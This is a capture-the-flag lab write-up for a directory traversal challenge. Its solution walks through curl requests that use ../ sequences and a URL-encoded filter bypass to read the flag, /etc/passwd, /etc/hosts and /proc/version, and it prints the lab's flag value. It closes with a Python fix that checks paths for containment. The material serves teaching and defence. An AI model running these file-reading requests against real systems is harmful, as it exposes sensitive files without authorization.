Labs / Simple Directory Traversal

  • Challenge
  • Released 29 Sep 2025

📁 Can you escape the directory and access restricted files?

This simple file viewer uses direct string concatenation to build file paths, creating the perfect opportunity for directory traversal attacks. 📁 Directory traversal is a fundamental web vulnerability that allows attackers to access files outside the intended directory, potentially exposing sensitive system files and configuration data. The application trusts user input without validation - a classic mistake that opens the door to file system exploitation! 🎯

  • Flags: 1
  • Points: 1

📁 Simple Directory Traversal - Complete Solution

Objective: Exploit directory traversal vulnerability in a simple file viewer application to access files outside the intended directory and retrieve the system flag.

🔍 Step 1: Application Discovery

Access the web application and explore its functionality:

curl -s http:///

The application is a "Simple File Viewer" that allows users to view text files. It shows available files: readme.txt, sample.txt, and info.txt.

🔍 Step 2: Normal File Viewing

Test the normal file viewing functionality:

curl -s "http:///view?file=readme.txt"

The application displays the file contents and shows the file path as "files/readme.txt", revealing how the path is constructed.

🔍 Step 3: Path Analysis

Examine how the file parameter is processed:

curl -s "http:///view?file=sample.txt"

The response shows "File Path: files/sample.txt": the file parameter is appended to the files/ prefix, which points to direct string concatenation without validation.

🔍 Step 4: Directory Traversal Testing

Test for directory traversal using ../ sequences:

curl -s "http:///view?file=../flag.txt"

This attempts to access a file one directory level up from the files directory.

🔍 Step 5: Flag Extraction

Successfully retrieve the flag using directory traversal:

# Extract the flag
curl -s "http:///view?file=../flag.txt" | grep -o '[0-9a-f]\{8\}-[0-9a-f]\{4\}-[0-9a-f]\{4\}-[0-9a-f]\{4\}-[0-9a-f]\{12\}'

The flag is revealed: cddc6bda-3d66-48e7-9848-6672afc2a5c8

🔍 Step 6: System File Access

Demonstrate accessing system files to show the full impact:

# Access system passwd file
curl -s "http:///view?file=../../etc/passwd"

This shows how directory traversal can be used to access sensitive system files.

🔍 Step 7: Multiple Traversal Levels

Test multiple directory levels to understand the file system structure:

# Try different traversal depths
curl -s "http:///view?file=../../../etc/hosts"
curl -s "http:///view?file=../../../../proc/version"

This demonstrates how multiple ../ sequences can traverse deeper into the file system.

🔍 Step 8: URL Encoding Bypass

Test URL encoding to bypass potential filters:

# URL-encoded directory traversal
curl -s "http:///view?file=%2e%2e%2fflag.txt"

This shows how URL encoding (%2e%2e%2f for ../) can bypass basic input filters that inspect the raw request rather than the decoded value.

🔍 Step 9: Path Information Disclosure

Observe how the application reveals the actual file paths:

curl -s "http:///view?file=../flag.txt" | grep "File Path:"

The response shows "File Path: files/../flag.txt", confirming the path construction method.

🔍 Step 10: Vulnerability Confirmation

Confirm the directory traversal vulnerability allows arbitrary file access:

# Verify the vulnerability
curl -s "http:///view?file=../flag.txt" | grep "SYSTEM FLAG"

This confirms successful exploitation of the directory traversal vulnerability.

🛡️ Security Implications

This challenge demonstrates a real directory traversal vulnerability where ../ sequences allow attackers to access files outside the intended directory. The vulnerability occurs because user input is directly concatenated into file paths without proper validation or sanitization. This can lead to unauthorized file access, information disclosure, and potential system compromise - making it a critical security vulnerability in web applications.
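
The concatenation flaw described above, next to a containment check that closes it. This is an added example, not the lab application's code: the page does not show the lab's source or language, so Python, the function names (`vulnerable_path`, `safe_path`) and the temporary directory layout are assumptions, and the files are constructed for the demonstration.

```python
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote

def vulnerable_path(base_dir, name):
    # The pattern the lab describes: user input concatenated onto the prefix.
    return base_dir + "/" + name

def safe_path(base_dir, name):
    """Return the resolved path if it stays inside base_dir, else None."""
    base = os.path.realpath(base_dir)
    # realpath collapses ../ segments and follows symlinks before the check.
    # os.path.join discards base when name is absolute, so check the result.
    candidate = os.path.realpath(os.path.join(base, name))
    # commonpath compares whole path components, so a sibling directory such
    # as "files_backup" is not accepted the way a startswith() test would.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate

def build_demo_tree():
    # Constructed layout: <root>/flag.txt and <root>/files/readme.txt
    root = Path(tempfile.mkdtemp())
    files = root / "files"
    files.mkdir()
    (files / "readme.txt").write_text("hello")
    (root / "flag.txt").write_text("constructed-secret")
    return str(files)

def check_requests():
    files = build_demo_tree()
    results = {}
    for raw in ["readme.txt", "../flag.txt", "%2e%2e%2fflag.txt", "/etc/passwd"]:
        # Web frameworks percent-decode the query value before the handler runs.
        name = unquote(raw)
        results[raw] = (
            os.path.exists(vulnerable_path(files, name)),  # concatenation reaches a file
            safe_path(files, name) is not None,            # containment check allows it
        )
    return results

if __name__ == "__main__":
    for raw, (reached, allowed) in check_requests().items():
        print(f"{raw!r}: concatenation reaches a file={reached}, check allows={allowed}")
```

Because the check runs on the resolved path rather than on the input string, the encoded and plain forms of the same request are rejected identically.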